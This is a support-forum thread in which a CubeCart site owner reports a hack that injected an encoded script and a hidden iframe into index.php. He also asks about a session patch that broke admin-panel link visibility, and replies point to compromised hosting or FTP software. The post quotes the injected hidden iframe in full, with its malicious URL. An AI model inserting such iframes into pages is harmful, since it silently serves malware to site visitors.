Jump to content

CC4 Hacked


Guest tiptoncp

Recommended Posts

Guest tiptoncp

The particular site is still in development on a closed system. Although the admin screen is still accessible for development login purposes. I just realized that the site had been hacked and there was an encoded script injected at the bottom of the index.php file in the main directory. The script is linked to a high risk malicious domain.

This is the iframe it injected. I did not decode the script, so I don't know if this is all it was doing or not.

<iframe width="635" height="586" style="display: none;" src="http://besenok.org/stds/go.php?sid=1&amp;12694ea4d" name="f884005"/>

I saw the update that apparently fixes some vulnerabilities with sessions. When I implemented it, it screwed up all of my user/superuser admin dashboards. The access rights was still correct, as it would prompt saying you did not have access to this page if you were just an admin, but instead of hiding the links like before, it was showing everything.

I have looked at the new code for the sessions, but I cannot find anything linked to the visibility of the inaccessible items. Any ideas?

Also, is the sessions fix directly related to the attack I mentioned above?

Thanks

Link to comment
Share on other sites

You need to contact your hosting company as they will be able to trace the hack. It may not have come in via CubeCart, but through someone else on that server. It's important to keep software on servers up-to-date to help prevent this type of thing, if someone else on the server has not upgraded their software the hack may have come in through there. Either way, your hosting company needs to know.

Link to comment
Share on other sites

  • 2 weeks later...
Guest tiptoncp

You brought up a good point that I didn't even think about... :(

Running 4.3.0, implemented this patch http://forums.cubecart.com/index.php?showtopic=39766

Makes my admin panel fully visible regardless of permissions. However, permissions are still intact and prompts a message saying access restricted when clicking on something.

So, I guess I need to implement the changes from 4.3.0 to 4.3.5 and then implement this patch. Usually, security patches are stand alone in version number. The site and admin panel are heavily modified. So, I try to only do security updates.

If you have any other ideas, let me know. Otherwise, I'll go back and stat implementing the previous patches.

Link to comment
Share on other sites

Guest tiptoncp

Oh, no. I haven't done the latest one. Just saw it today, actually.

Well... I'm not sure why 4.3.6 would change everything thing then... but it does. I looked at the code. Maybe I missed it, but I didn't see anything related to visibility of items. Which, I wouldn't expect it to be. So, I'm a bit lost as to why it has an effect on that.

Link to comment
Share on other sites

Guest asafisk

The only time I've seen this before is when someone used compromised FTP software to upload files. The FTP program - I forget the name now inserted an iframe in any 'index.' file that was uploaded.

I guess FTP software could become compromised in a number of ways, the two most likely being,

1. the FTP software has been hacked before being installed

2. there is a virus on the pc which has contaminated the FTP software

Of course you would need to change the FTP login details as these will most likely have been reported to the iframe host.

If you have uploaded files to other sites they should also be checked.

I would recommend running good antivirus (my favourite at the moment is Kaspersky) and removing and replacing the FTP software with something clean and secure. I quite like SmartFTP.

The iframe can then be removed manually and the file re-uploaded.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...